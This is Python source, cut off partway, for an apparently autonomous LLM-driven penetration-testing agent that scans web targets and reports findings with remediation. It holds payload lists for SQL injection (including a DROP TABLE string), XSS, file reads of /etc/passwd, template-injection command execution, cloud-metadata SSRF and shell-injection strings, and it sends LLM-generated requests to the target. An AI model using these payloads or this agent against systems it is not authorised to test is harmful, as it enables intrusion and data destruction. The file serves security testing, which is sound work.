""" NeuroSploit v3 - Autonomous AI Security Agent REAL AI-powered penetration testing agent that: 1. Actually calls Claude/OpenAI API for intelligent analysis 2. Performs comprehensive reconnaissance 3. Tests vulnerabilities with proper verification (no false positives) 4. Generates detailed reports with CVSS, PoC, remediation """ import asyncio import aiohttp import json import re import os import hashlib from typing import Dict, List, Any, Optional, Callable, Tuple from dataclasses import dataclass, field, asdict from datetime import datetime from urllib.parse import urljoin, urlparse, parse_qs, urlencode from enum import Enum from pathlib import Path # Try to import anthropic for Claude API try: import anthropic ANTHROPIC_AVAILABLE = True except ImportError: ANTHROPIC_AVAILABLE = False anthropic = None # Try to import openai try: import openai OPENAI_AVAILABLE = True except ImportError: OPENAI_AVAILABLE = False openai = None class OperationMode(Enum): """Agent operation modes""" RECON_ONLY = "recon_only" FULL_AUTO = "full_auto" PROMPT_ONLY = "prompt_only" ANALYZE_ONLY = "analyze_only" class FindingSeverity(Enum): CRITICAL = "critical" HIGH = "high" MEDIUM = "medium" LOW = "low" INFO = "info" @dataclass class CVSSScore: """CVSS 3.1 Score""" score: float severity: str vector: str @dataclass class Finding: """Vulnerability finding with full details""" id: str title: str severity: str vulnerability_type: str = "" cvss_score: float = 0.0 cvss_vector: str = "" cwe_id: str = "" description: str = "" affected_endpoint: str = "" parameter: str = "" payload: str = "" evidence: str = "" request: str = "" response: str = "" impact: str = "" poc_code: str = "" remediation: str = "" references: List[str] = field(default_factory=list) ai_verified: bool = False confidence: str = "high" @dataclass class ReconData: """Reconnaissance data""" subdomains: List[str] = field(default_factory=list) live_hosts: List[str] = field(default_factory=list) endpoints: List[Dict] = field(default_factory=list) parameters: Dict[str, List[str]] = field(default_factory=dict) technologies: List[str] = field(default_factory=list) forms: List[Dict] = field(default_factory=list) js_files: List[str] = field(default_factory=list) api_endpoints: List[str] = field(default_factory=list) def _get_endpoint_url(ep) -> str: """Safely get URL from endpoint (handles both str and dict)""" if isinstance(ep, str): return ep elif isinstance(ep, dict): return ep.get("url", "") return "" def _get_endpoint_method(ep) -> str: """Safely get method from endpoint""" if isinstance(ep, dict): return ep.get("method", "GET") return "GET" class LLMClient: """Unified LLM client for Claude, OpenAI, Ollama, and Gemini""" # Ollama and LM Studio endpoints OLLAMA_URL = os.getenv("OLLAMA_URL", "http://localhost:11434") LMSTUDIO_URL = os.getenv("LMSTUDIO_URL", "http://localhost:1234") GEMINI_URL = "https://generativelanguage.googleapis.com/v1beta" def __init__(self): self.anthropic_key = os.getenv("ANTHROPIC_API_KEY", "") self.openai_key = os.getenv("OPENAI_API_KEY", "") self.google_key = os.getenv("GOOGLE_API_KEY", "") self.ollama_model = os.getenv("OLLAMA_MODEL", "llama3.2") self.client = None self.provider = None self.error_message = None self.connection_tested = False # Validate keys are not placeholder values if self.anthropic_key in ["", "your-anthropic-api-key"]: self.anthropic_key = None if self.openai_key in ["", "your-openai-api-key"]: self.openai_key = None if self.google_key in ["", "your-google-api-key"]: self.google_key = None # Try providers in 
order of preference self._initialize_provider() def _initialize_provider(self): """Initialize the first available LLM provider""" # 1. Try Claude (Anthropic) if ANTHROPIC_AVAILABLE and self.anthropic_key: try: self.client = anthropic.Anthropic(api_key=self.anthropic_key) self.provider = "claude" print("[LLM] Claude API initialized successfully") return except Exception as e: self.error_message = f"Claude init error: {e}" print(f"[LLM] Claude initialization failed: {e}") # 2. Try OpenAI if OPENAI_AVAILABLE and self.openai_key: try: self.client = openai.OpenAI(api_key=self.openai_key) self.provider = "openai" print("[LLM] OpenAI API initialized successfully") return except Exception as e: self.error_message = f"OpenAI init error: {e}" print(f"[LLM] OpenAI initialization failed: {e}") # 3. Try Google Gemini if self.google_key: self.client = "gemini" # Placeholder - uses HTTP requests self.provider = "gemini" print("[LLM] Gemini API initialized") return # 4. Try Ollama (local) if self._check_ollama(): self.client = "ollama" # Placeholder - uses HTTP requests self.provider = "ollama" print(f"[LLM] Ollama initialized with model: {self.ollama_model}") return # 5. Try LM Studio (local) if self._check_lmstudio(): self.client = "lmstudio" # Placeholder - uses HTTP requests self.provider = "lmstudio" print("[LLM] LM Studio initialized") return # No provider available self._set_no_provider_error() def _check_ollama(self) -> bool: """Check if Ollama is running locally""" try: import requests response = requests.get(f"{self.OLLAMA_URL}/api/tags", timeout=2) return response.status_code == 200 except Exception: return False def _check_lmstudio(self) -> bool: """Check if LM Studio is running locally""" try: import requests response = requests.get(f"{self.LMSTUDIO_URL}/v1/models", timeout=2) return response.status_code == 200 except Exception: return False def _set_no_provider_error(self): """Set appropriate error message when no provider is available""" errors = [] if not ANTHROPIC_AVAILABLE and not OPENAI_AVAILABLE: errors.append("LLM libraries not installed (run: pip install anthropic openai)") if not self.anthropic_key and not self.openai_key and not self.google_key: errors.append("No API keys configured") if not self._check_ollama(): errors.append("Ollama not running locally") if not self._check_lmstudio(): errors.append("LM Studio not running locally") self.error_message = "No LLM provider available. 
" + "; ".join(errors) print(f"[LLM] WARNING: {self.error_message}") def is_available(self) -> bool: return self.client is not None def get_status(self) -> dict: """Get LLM status for debugging""" return { "available": self.is_available(), "provider": self.provider, "error": self.error_message, "anthropic_lib": ANTHROPIC_AVAILABLE, "openai_lib": OPENAI_AVAILABLE, "ollama_available": self._check_ollama(), "lmstudio_available": self._check_lmstudio(), "has_google_key": bool(self.google_key) } async def test_connection(self) -> Tuple[bool, str]: """Test if the API connection is working""" if not self.client: return False, self.error_message or "No LLM client configured" try: # Simple test prompt result = await self.generate("Say 'OK' if you can hear me.", max_tokens=10) if result: self.connection_tested = True return True, f"Connected to {self.provider}" return False, f"Empty response from {self.provider}" except Exception as e: return False, f"Connection test failed for {self.provider}: {str(e)}" async def generate(self, prompt: str, system: str = "", max_tokens: int = 4096) -> str: """Generate response from LLM""" if not self.client: raise LLMConnectionError(self.error_message or "No LLM provider available") default_system = "You are an expert penetration tester and security researcher. Provide accurate, technical, and actionable security analysis. Be precise and avoid false positives." try: if self.provider == "claude": message = self.client.messages.create( model="claude-sonnet-4-20250514", max_tokens=max_tokens, system=system or default_system, messages=[{"role": "user", "content": prompt}] ) return message.content[0].text elif self.provider == "openai": response = self.client.chat.completions.create( model="gpt-4-turbo-preview", max_tokens=max_tokens, messages=[ {"role": "system", "content": system or default_system}, {"role": "user", "content": prompt} ] ) return response.choices[0].message.content elif self.provider == "gemini": return await self._generate_gemini(prompt, system or default_system, max_tokens) elif self.provider == "ollama": return await self._generate_ollama(prompt, system or default_system) elif self.provider == "lmstudio": return await self._generate_lmstudio(prompt, system or default_system, max_tokens) except LLMConnectionError: raise except Exception as e: error_msg = str(e) print(f"[LLM] Error from {self.provider}: {error_msg}") raise LLMConnectionError(f"API call failed ({self.provider}): {error_msg}") return "" async def _generate_gemini(self, prompt: str, system: str, max_tokens: int) -> str: """Generate using Google Gemini API""" import aiohttp url = f"{self.GEMINI_URL}/models/gemini-pro:generateContent?key={self.google_key}" payload = { "contents": [{"parts": [{"text": f"{system}\n\n{prompt}"}]}], "generationConfig": {"maxOutputTokens": max_tokens} } async with aiohttp.ClientSession() as session: async with session.post(url, json=payload, timeout=aiohttp.ClientTimeout(total=60)) as response: if response.status != 200: error_text = await response.text() raise LLMConnectionError(f"Gemini API error ({response.status}): {error_text}") data = await response.json() return data.get("candidates", [{}])[0].get("content", {}).get("parts", [{}])[0].get("text", "") async def _generate_ollama(self, prompt: str, system: str) -> str: """Generate using local Ollama""" import aiohttp url = f"{self.OLLAMA_URL}/api/generate" payload = { "model": self.ollama_model, "prompt": prompt, "system": system, "stream": False } async with aiohttp.ClientSession() as session: async with 
session.post(url, json=payload, timeout=aiohttp.ClientTimeout(total=120)) as response: if response.status != 200: error_text = await response.text() raise LLMConnectionError(f"Ollama error ({response.status}): {error_text}") data = await response.json() return data.get("response", "") async def _generate_lmstudio(self, prompt: str, system: str, max_tokens: int) -> str: """Generate using LM Studio (OpenAI-compatible)""" import aiohttp url = f"{self.LMSTUDIO_URL}/v1/chat/completions" payload = { "messages": [ {"role": "system", "content": system}, {"role": "user", "content": prompt} ], "max_tokens": max_tokens, "stream": False } async with aiohttp.ClientSession() as session: async with session.post(url, json=payload, timeout=aiohttp.ClientTimeout(total=120)) as response: if response.status != 200: error_text = await response.text() raise LLMConnectionError(f"LM Studio error ({response.status}): {error_text}") data = await response.json() return data.get("choices", [{}])[0].get("message", {}).get("content", "") class LLMConnectionError(Exception): """Exception raised when LLM connection fails""" pass class AutonomousAgent: """ AI-Powered Autonomous Security Agent Performs real security testing with AI-powered analysis """ # Comprehensive payload sets for testing PAYLOADS = { "sqli": [ "'", "\"", "' OR '1'='1", "\" OR \"1\"=\"1", "' OR 1=1--", "admin'--", "1' AND '1'='1", "1 AND 1=1", "' UNION SELECT NULL--", "1' AND SLEEP(5)--", "1' WAITFOR DELAY '0:0:5'--", "1'; DROP TABLE users--", "' OR ''='", "1' ORDER BY 1--" ], "xss": [ "<script>alert('XSS')</script>", "<img src=x onerror=alert('XSS')>", "\"><script>alert('XSS')</script>", "'-alert('XSS')-'", "<svg/onload=alert('XSS')>", "javascript:alert('XSS')", "<body onload=alert('XSS')>", "{{constructor.constructor('alert(1)')()}}", "<iframe src=javascript:alert('XSS')>", ], "lfi": [ "../../../etc/passwd", "....//....//....//etc/passwd", "/etc/passwd", "..\\..\\..\\windows\\system32\\drivers\\etc\\hosts", "php://filter/convert.base64-encode/resource=index.php", "file:///etc/passwd", "/proc/self/environ", "..%2f..%2f..%2fetc%2fpasswd", r"....\/....\/....\/etc/passwd" ], "ssti": [ "{{7*7}}", "${7*7}", "<%= 7*7 %>", "#{7*7}", "*{7*7}", "{{config}}", "{{self.__class__.__mro__}}", "${T(java.lang.Runtime).getRuntime().exec('id')}", "{{''.__class__.__mro__[1].__subclasses__()}}" ], "ssrf": [ "http://127.0.0.1", "http://localhost", "http://169.254.169.254/latest/meta-data/", "http://[::1]", "http://0.0.0.0", "file:///etc/passwd", "http://metadata.google.internal/", "http://100.100.100.200/" ], "rce": [ "; id", "| id", "$(id)", "`id`", "&& id", "; cat /etc/passwd", "| cat /etc/passwd", "; whoami", "| whoami", "&& whoami" ], "open_redirect": [ "//evil.com", "https://evil.com", "/\\evil.com", "//evil.com/%2f..", "https:evil.com", "////evil.com" ] } # Vulnerability indicators for each type VULN_INDICATORS = { "sqli": { "errors": [ "sql syntax", "mysql_", "pg_query", "ora-", "sqlite_", "database error", "syntax error", "unclosed quotation", "you have an error in your sql", "warning: mysql", "postgresql", "microsoft sql native client error", "odbc drivers error", "invalid query", "sql command" ], "blind_indicators": ["different response", "time delay"] }, "xss": { "reflection_check": True, # Check if payload is reflected "context_check": True # Check if in dangerous context }, "lfi": { "content": [ "root:x:", "root:*:", "[boot loader]", "localhost", "daemon:x:", "bin:x:", "sys:x:", "www-data" ] }, "ssti": { "evaluation": {"7*7": "49", "7*'7'": "7777777"} }, "ssrf": { "internal_access": ["127.0.0.1", "localhost", "internal"] } } def __init__( self, target: str, mode: OperationMode = OperationMode.FULL_AUTO, log_callback:
Optional[Callable] = None, progress_callback: Optional[Callable] = None, auth_headers: Optional[Dict] = None, task: Optional[Any] = None, custom_prompt: Optional[str] = None, recon_context: Optional[Dict] = None, finding_callback: Optional[Callable] = None, ): self.target = self._normalize_target(target) self.mode = mode self.log = log_callback or self._default_log self.progress_callback = progress_callback self.finding_callback = finding_callback self.auth_headers = auth_headers or {} self.task = task self.custom_prompt = custom_prompt self.recon_context = recon_context self._cancelled = False self.session: Optional[aiohttp.ClientSession] = None self.llm = LLMClient() # Data storage self.recon = ReconData() self.findings: List[Finding] = [] self.tested_payloads: set = set() self.custom_prompts: List[str] = [] def cancel(self): """Cancel the agent execution""" self._cancelled = True def is_cancelled(self) -> bool: """Check if agent was cancelled""" return self._cancelled async def add_custom_prompt(self, prompt: str): """Add a custom prompt to be processed""" self.custom_prompts.append(prompt) await self.log_llm("info", f"[USER PROMPT RECEIVED] {prompt}") # Process immediately if LLM is available if self.llm.is_available(): await self._process_custom_prompt(prompt) async def _process_custom_prompt(self, prompt: str): """Process a custom user prompt with the LLM and execute requested tests""" await self.log_llm("info", f"[AI] Processing user prompt: {prompt}") # Build context about available endpoints endpoints_info = [] for ep in self.recon.endpoints[:20]: # Limit to 20 for context endpoints_info.append(f"- {_get_endpoint_method(ep)} {_get_endpoint_url(ep)}") params_info = [] for param, values in list(self.recon.parameters.items())[:15]: params_info.append(f"- {param}: {values[:3]}") system_prompt = f"""You are an expert penetration tester analyzing {self.target}. The user has requested a specific test. Analyze the request and provide a structured response. 
Current reconnaissance data: Endpoints ({len(self.recon.endpoints)} total): {chr(10).join(endpoints_info[:10]) if endpoints_info else ' None discovered yet'} Parameters ({len(self.recon.parameters)} total): {chr(10).join(params_info[:10]) if params_info else ' None discovered yet'} Technologies detected: {', '.join(self.recon.technologies) if self.recon.technologies else 'None'} IMPORTANT: Respond in this JSON format: {{ "analysis": "Your analysis of what the user is asking", "action": "test_endpoint|test_parameter|scan_for|analyze|info", "targets": ["list of specific URLs or parameters to test"], "vuln_types": ["xss", "sqli", "idor", "ssrf", etc - if applicable], "response": "Your detailed response to show the user" }} If the request is unclear or just informational, use action "info" and provide helpful guidance.""" try: response = await self.llm.generate(prompt, system=system_prompt) if not response: await self.log_llm("warning", "[AI] No response from LLM") return await self.log_llm("info", f"[AI] Analyzing request...") # Try to parse as JSON for structured actions import json try: # Extract JSON from response json_match = re.search(r'\{[\s\S]*\}', response) if json_match: action_data = json.loads(json_match.group()) action = action_data.get("action", "info") targets = action_data.get("targets", []) vuln_types = action_data.get("vuln_types", []) ai_response = action_data.get("response", response) await self.log_llm("info", f"[AI RESPONSE] {ai_response}") # Execute the requested action if action == "test_endpoint" and targets: await self.log_llm("info", f"[AI] Executing endpoint tests on {len(targets)} targets...") for target_url in targets[:5]: # Limit to 5 targets await self._test_custom_endpoint(target_url, vuln_types or ["xss", "sqli"]) elif action == "test_parameter" and targets: await self.log_llm("info", f"[AI] Testing parameters: {targets}") await self._test_custom_parameters(targets, vuln_types or ["xss", "sqli"]) elif action == "scan_for" and vuln_types: await self.log_llm("info", f"[AI] Scanning for: {vuln_types}") for vtype in vuln_types[:3]: # Limit to 3 vuln types await self._scan_for_vuln_type(vtype) elif action == "analyze": await self.log_llm("info", f"[AI] Analysis complete - check response above") else: await self.log_llm("info", f"[AI] Informational response provided") else: # No structured JSON, just show the response await self.log_llm("info", f"[AI RESPONSE] {response[:1000]}") except json.JSONDecodeError: # If not valid JSON, just show the response await self.log_llm("info", f"[AI RESPONSE] {response[:1000]}") except Exception as e: await self.log_llm("error", f"[AI] Error processing prompt: {str(e)}") async def _test_custom_endpoint(self, url: str, vuln_types: List[str]): """Test a specific endpoint for vulnerabilities""" if not self.session: return await self.log("info", f" Testing endpoint: {url}") try: # Parse URL to find parameters parsed = urlparse(url) params = parse_qs(parsed.query) if not params: # Try adding common parameters params = {"id": ["1"], "q": ["test"]} for param_name in list(params.keys())[:3]: for vtype in vuln_types[:2]: payloads = self.PAYLOADS.get(vtype, [])[:2] for payload in payloads: await self._test_single_param(url, param_name, payload, vtype) except Exception as e: await self.log("debug", f" Error testing {url}: {e}") async def _test_custom_parameters(self, param_names: List[str], vuln_types: List[str]): """Test specific parameters across known endpoints""" endpoints_with_params = [ ep for ep in self.recon.endpoints if any(p in 
str(ep) for p in param_names) ] if not endpoints_with_params: # Use all endpoints that have parameters endpoints_with_params = self.recon.endpoints[:10] for ep in endpoints_with_params[:5]: url = _get_endpoint_url(ep) for param in param_names[:3]: for vtype in vuln_types[:2]: payloads = self.PAYLOADS.get(vtype, [])[:2] for payload in payloads: await self._test_single_param(url, param, payload, vtype) async def _scan_for_vuln_type(self, vuln_type: str): """Scan all endpoints for a specific vulnerability type""" await self.log("info", f" Scanning for {vuln_type.upper()} vulnerabilities...") vuln_lower = vuln_type.lower() # Handle header-based vulnerabilities (no payloads needed) if vuln_lower in ["clickjacking", "x-frame-options", "csp", "hsts", "headers", "security headers", "missing headers"]: await self._test_security_headers(vuln_lower) return # Handle CORS testing if vuln_lower in ["cors", "cross-origin"]: await self._test_cors() return # Handle information disclosure if vuln_lower in ["info", "information disclosure", "version", "technology"]: await self._test_information_disclosure() return # Standard payload-based testing payloads = self.PAYLOADS.get(vuln_type, [])[:3] if not payloads: # Try AI-based testing for unknown vuln types await self._ai_test_vulnerability(vuln_type) return for ep in self.recon.endpoints[:10]: url = _get_endpoint_url(ep) for param in list(self.recon.parameters.keys())[:5]: for payload in payloads: await self._test_single_param(url, param, payload, vuln_type) async def _test_security_headers(self, vuln_type: str): """Test for security header vulnerabilities like clickjacking""" await self.log("info", f" Testing security headers...") # Test main target and key pages test_urls = [self.target] for ep in self.recon.endpoints[:5]: url = _get_endpoint_url(ep) if isinstance(ep, dict) else ep if url and url not in test_urls: test_urls.append(url) for url in test_urls: try: async with self.session.get(url, allow_redirects=True) as resp: headers = dict(resp.headers) headers_lower = {k.lower(): v for k, v in headers.items()} findings = [] # Check X-Frame-Options (Clickjacking) x_frame = headers_lower.get("x-frame-options", "") csp = headers_lower.get("content-security-policy", "") if not x_frame and "frame-ancestors" not in csp.lower(): findings.append({ "type": "clickjacking", "title": "Missing Clickjacking Protection", "severity": "medium", "description": "The page lacks X-Frame-Options header and CSP frame-ancestors directive, making it vulnerable to clickjacking attacks.", "evidence": f"X-Frame-Options: Not set\nCSP: {csp[:100] if csp else 'Not set'}", "remediation": "Add 'X-Frame-Options: DENY' or 'X-Frame-Options: SAMEORIGIN' header, or use 'frame-ancestors' in CSP." }) await self.log("warning", f" [FOUND] Clickjacking vulnerability - missing X-Frame-Options") # Check HSTS hsts = headers_lower.get("strict-transport-security", "") if not hsts and url.startswith("https"): findings.append({ "type": "missing_hsts", "title": "Missing HSTS Header", "severity": "low", "description": "HTTPS site without Strict-Transport-Security header, vulnerable to protocol downgrade attacks.", "evidence": "Strict-Transport-Security: Not set", "remediation": "Add 'Strict-Transport-Security: max-age=31536000; includeSubDomains' header." 
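# Like the clickjacking check above, this finding is only raised for HTTPS targets; each dict collected here is converted into a Finding further below, with a CVSS score mapped from its severity.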
}) # Check X-Content-Type-Options if "x-content-type-options" not in headers_lower: findings.append({ "type": "missing_xcto", "title": "Missing X-Content-Type-Options Header", "severity": "low", "description": "Missing nosniff header allows MIME-sniffing attacks.", "evidence": "X-Content-Type-Options: Not set", "remediation": "Add 'X-Content-Type-Options: nosniff' header." }) # Check CSP if not csp: findings.append({ "type": "missing_csp", "title": "Missing Content-Security-Policy Header", "severity": "low", "description": "No Content-Security-Policy header, increasing XSS risk.", "evidence": "Content-Security-Policy: Not set", "remediation": "Implement a restrictive Content-Security-Policy." }) # Create findings for f in findings: finding = Finding( id=hashlib.md5(f"{f['type']}{url}".encode()).hexdigest()[:8], title=f["title"], severity=f["severity"], vulnerability_type=f["type"], cvss_score={"critical": 9.0, "high": 7.0, "medium": 4.0, "low": 3.0}.get(f["severity"], 3.0), cvss_vector="CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N", cwe_id="CWE-1021" if "clickjacking" in f["type"] else "CWE-693", description=f["description"], affected_endpoint=url, evidence=f["evidence"], remediation=f["remediation"], ai_verified=True ) await self._add_finding(finding) except Exception as e: await self.log("debug", f" Header test error: {e}") async def _test_cors(self): """Test for CORS misconfigurations""" await self.log("info", f" Testing CORS configuration...") test_origins = [ "https://evil.com", "https://attacker.com", "null" ] for url in [self.target] + [_get_endpoint_url(ep) for ep in self.recon.endpoints[:3]]: if not url: continue for origin in test_origins: try: headers = {"Origin": origin} async with self.session.get(url, headers=headers) as resp: acao = resp.headers.get("Access-Control-Allow-Origin", "") acac = resp.headers.get("Access-Control-Allow-Credentials", "") if acao == origin or acao == "*": severity = "high" if acac.lower() == "true" else "medium" finding = Finding( id=hashlib.md5(f"cors{url}{origin}".encode()).hexdigest()[:8], title=f"CORS Misconfiguration - {origin}", severity=severity, vulnerability_type="cors", cvss_score=7.5 if severity == "high" else 5.0, cvss_vector="CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N", cwe_id="CWE-942", description=f"The server reflects the Origin header '{origin}' in Access-Control-Allow-Origin, potentially allowing cross-origin data theft.", affected_endpoint=url, evidence=f"Origin: {origin}\nAccess-Control-Allow-Origin: {acao}\nAccess-Control-Allow-Credentials: {acac}", remediation="Configure CORS to only allow trusted origins. 
Avoid using wildcard (*) or reflecting arbitrary origins.", ai_verified=True ) await self._add_finding(finding) await self.log("warning", f" [FOUND] CORS misconfiguration at {url[:50]}") break except: pass async def _test_information_disclosure(self): """Test for information disclosure""" await self.log("info", f" Testing for information disclosure...") for url in [self.target] + [_get_endpoint_url(ep) for ep in self.recon.endpoints[:5]]: if not url: continue try: async with self.session.get(url) as resp: headers = dict(resp.headers) # Server header disclosure server = headers.get("Server", "") if server and any(v in server.lower() for v in ["apache/", "nginx/", "iis/", "tomcat/"]): finding = Finding( id=hashlib.md5(f"server{url}".encode()).hexdigest()[:8], title="Server Version Disclosure", severity="info", vulnerability_type="information_disclosure", cvss_score=0.0, cwe_id="CWE-200", description=f"The server discloses its version: {server}", affected_endpoint=url, evidence=f"Server: {server}", remediation="Remove or obfuscate the Server header to prevent version disclosure.", ai_verified=True ) await self._add_finding(finding) # X-Powered-By disclosure powered_by = headers.get("X-Powered-By", "") if powered_by: finding = Finding( id=hashlib.md5(f"poweredby{url}".encode()).hexdigest()[:8], title="Technology Version Disclosure", severity="info", vulnerability_type="information_disclosure", cvss_score=0.0, cwe_id="CWE-200", description=f"The X-Powered-By header reveals technology: {powered_by}", affected_endpoint=url, evidence=f"X-Powered-By: {powered_by}", remediation="Remove the X-Powered-By header.", ai_verified=True ) await self._add_finding(finding) except: pass async def _ai_dynamic_test(self, user_prompt: str): """ AI-driven dynamic vulnerability testing - can test ANY vulnerability type. The LLM generates payloads, test strategies, and analyzes results dynamically. Examples of what this can test: - XXE (XML External Entity) - Race Conditions - Rate Limiting Bypass - WAF Bypass - CSP Bypass - BFLA (Broken Function Level Authorization) - BOLA (Broken Object Level Authorization) - JWT vulnerabilities - GraphQL injection - NoSQL injection - Prototype pollution - And ANY other vulnerability type! """ await self.log("info", f"[AI DYNAMIC TEST] Processing: {user_prompt}") if not self.llm.is_available(): await self.log("warning", " LLM not available - attempting basic tests based on prompt") await self._ai_test_fallback(user_prompt) return # Gather reconnaissance context endpoints_info = [] for ep in self.recon.endpoints[:15]: url = _get_endpoint_url(ep) method = _get_endpoint_method(ep) if url: endpoints_info.append({"url": url, "method": method}) forms_info = [] for form in self.recon.forms[:5]: if isinstance(form, dict): forms_info.append({ "action": form.get("action", ""), "method": form.get("method", "GET"), "inputs": form.get("inputs", [])[:5] }) context = f""" TARGET: {self.target} TECHNOLOGIES: {', '.join(self.recon.technologies) if self.recon.technologies else 'Unknown'} ENDPOINTS ({len(endpoints_info)} found): {json.dumps(endpoints_info[:10], indent=2)} FORMS ({len(forms_info)} found): {json.dumps(forms_info, indent=2)} PARAMETERS DISCOVERED: {list(self.recon.parameters.keys())[:20]} """ # Phase 1: Ask AI to understand the vulnerability and create test strategy strategy_prompt = f"""You are an expert penetration tester. The user wants to test for: "{user_prompt}" Based on the target information below, create a comprehensive testing strategy. 
{context} Respond in JSON format with: {{ "vulnerability_type": "name of the vulnerability being tested", "cwe_id": "CWE-XXX if applicable", "owasp_category": "OWASP category if applicable", "description": "Brief description of what this vulnerability is", "severity_if_found": "critical|high|medium|low", "cvss_estimate": 0.0-10.0, "test_cases": [ {{ "name": "Test case name", "technique": "Technique being used", "url": "URL to test (use actual URLs from context)", "method": "GET|POST|PUT|DELETE", "headers": {{"Header-Name": "value"}}, "body": "request body if POST/PUT", "content_type": "application/json|application/xml|application/x-www-form-urlencoded", "success_indicators": ["what to look for in response that indicates vulnerability"], "failure_indicators": ["what indicates NOT vulnerable"] }} ], "payloads": ["list of specific payloads to try"], "analysis_tips": "What patterns or behaviors indicate this vulnerability" }} Generate at least 3-5 realistic test cases using the actual endpoints from the context. Be creative and thorough - think like a real penetration tester.""" await self.log("info", " Phase 1: AI generating test strategy...") try: strategy_response = await self.llm.generate( strategy_prompt, "You are an expert penetration tester specializing in web application security. Provide detailed, actionable test strategies." ) # Extract JSON from response match = re.search(r'\{[\s\S]*\}', strategy_response) if not match: await self.log("warning", " AI did not return valid JSON strategy, using fallback") await self._ai_test_fallback(user_prompt) return strategy = json.loads(match.group()) vuln_type = strategy.get("vulnerability_type", user_prompt) cwe_id = strategy.get("cwe_id", "") severity = strategy.get("severity_if_found", "medium") cvss = strategy.get("cvss_estimate", 5.0) description = strategy.get("description", f"Testing for {vuln_type}") await self.log("info", f" Vulnerability: {vuln_type}") await self.log("info", f" CWE: {cwe_id} | Severity: {severity} | CVSS: {cvss}") await self.log("info", f" Test cases: {len(strategy.get('test_cases', []))}") # Phase 2: Execute test cases await self.log("info", " Phase 2: Executing AI-generated test cases...") test_results = [] for i, test_case in enumerate(strategy.get("test_cases", [])[:10]): test_name = test_case.get("name", f"Test {i+1}") await self.log("debug", f" Running: {test_name}") result = await self._execute_ai_dynamic_test(test_case) if result: result["test_name"] = test_name result["success_indicators"] = test_case.get("success_indicators", []) result["failure_indicators"] = test_case.get("failure_indicators", []) test_results.append(result) # Phase 3: AI analysis of results await self.log("info", " Phase 3: AI analyzing results...") analysis_prompt = f"""Analyze these test results for {vuln_type} vulnerability. VULNERABILITY BEING TESTED: {vuln_type} {description} ANALYSIS TIPS: {strategy.get('analysis_tips', 'Look for error messages, unexpected behavior, or data leakage')} TEST RESULTS: {json.dumps(test_results[:5], indent=2, default=str)[:8000]} For each test result, analyze if it indicates a vulnerability. 
Consider: - Success indicators: {strategy.get('test_cases', [{}])[0].get('success_indicators', [])} - Response status codes, error messages, timing differences, data in response Respond in JSON: {{ "findings": [ {{ "is_vulnerable": true|false, "confidence": "high|medium|low", "test_name": "which test", "evidence": "specific evidence from response", "explanation": "why this indicates vulnerability" }} ], "overall_assessment": "summary of findings", "recommendations": ["list of remediation steps"] }}""" analysis_response = await self.llm.generate( analysis_prompt, "You are a security analyst. Analyze test results and identify vulnerabilities with precision. Only report real findings with clear evidence." ) # Parse analysis analysis_match = re.search(r'\{[\s\S]*\}', analysis_response) if analysis_match: analysis = json.loads(analysis_match.group()) for finding_data in analysis.get("findings", []): if finding_data.get("is_vulnerable") and finding_data.get("confidence") in ["high", "medium"]: evidence = finding_data.get("evidence", "") test_name = finding_data.get("test_name", "AI Test") # Find the matching test result for endpoint affected_endpoint = self.target for tr in test_results: if tr.get("test_name") == test_name: affected_endpoint = tr.get("url", self.target) break finding = Finding( id=hashlib.md5(f"{vuln_type}{affected_endpoint}{test_name}".encode()).hexdigest()[:8], title=f"{vuln_type}", severity=severity, vulnerability_type=vuln_type.lower().replace(" ", "_"), cvss_score=float(cvss) if cvss else 5.0, cvss_vector="CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", cwe_id=cwe_id or "CWE-1035", description=f"{description}\n\nAI Explanation: {finding_data.get('explanation', '')}", affected_endpoint=affected_endpoint, evidence=evidence[:1000], remediation="\n".join(analysis.get("recommendations", [f"Remediate the {vuln_type} vulnerability"])), ai_verified=True ) await self._add_finding(finding) await self.log("warning", f" [AI FOUND] {vuln_type} - {finding_data.get('confidence')} confidence") await self.log("info", f" Assessment: {analysis.get('overall_assessment', 'Analysis complete')[:100]}") except json.JSONDecodeError as e: await self.log("warning", f" JSON parse error: {e}") await self._ai_test_fallback(user_prompt) except Exception as e: await self.log("error", f" AI dynamic test error: {e}") await self._ai_test_fallback(user_prompt) async def _execute_ai_dynamic_test(self, test_case: Dict) -> Optional[Dict]: """Execute a single AI-generated test case""" if not self.session: return None try: url = test_case.get("url", self.target) method = test_case.get("method", "GET").upper() headers = test_case.get("headers", {}) body = test_case.get("body", "") content_type = test_case.get("content_type", "") if content_type and "Content-Type" not in headers: headers["Content-Type"] = content_type start_time = asyncio.get_event_loop().time() if method == "GET": async with self.session.get(url, headers=headers, allow_redirects=False) as resp: response_body = await resp.text() response_time = asyncio.get_event_loop().time() - start_time return { "url": url, "method": method, "status": resp.status, "headers": dict(list(resp.headers.items())[:20]), "body_preview": response_body[:2000], "body_length": len(response_body), "response_time": round(response_time, 3) } elif method == "POST": if content_type == "application/json" and isinstance(body, str): try: body = json.loads(body) except: pass async with self.session.post(url, headers=headers, data=body if isinstance(body, str) else None, json=body if 
isinstance(body, dict) else None, allow_redirects=False) as resp: response_body = await resp.text() response_time = asyncio.get_event_loop().time() - start_time return { "url": url, "method": method, "status": resp.status, "headers": dict(list(resp.headers.items())[:20]), "body_preview": response_body[:2000], "body_length": len(response_body), "response_time": round(response_time, 3) } elif method in ["PUT", "DELETE", "PATCH"]: request_method = getattr(self.session, method.lower()) async with request_method(url, headers=headers, data=body, allow_redirects=False) as resp: response_body = await resp.text() response_time = asyncio.get_event_loop().time() - start_time return { "url": url, "method": method, "status": resp.status, "headers": dict(list(resp.headers.items())[:20]), "body_preview": response_body[:2000], "body_length": len(response_body), "response_time": round(response_time, 3) } except Exception as e: return { "url": url, "method": method, "error": str(e), "status": 0 } return None async def _ai_test_fallback(self, user_prompt: str): """Fallback testing when LLM is not available - uses keyword detection""" await self.log("info", f" Running fallback tests for: {user_prompt}") prompt_lower = user_prompt.lower() # Define fallback test mappings fallback_tests = { "xxe": self._test_xxe_fallback, "xml": self._test_xxe_fallback, "race": self._test_race_condition_fallback, "rate": self._test_rate_limit_fallback, "bola": self._test_idor_fallback, "idor": self._test_idor_fallback, "bfla": self._test_bfla_fallback, "jwt": self._test_jwt_fallback, "graphql": self._test_graphql_fallback, "nosql": self._test_nosql_fallback, "waf": self._test_waf_bypass_fallback, "csp": self._test_csp_bypass_fallback, } tests_run = False for 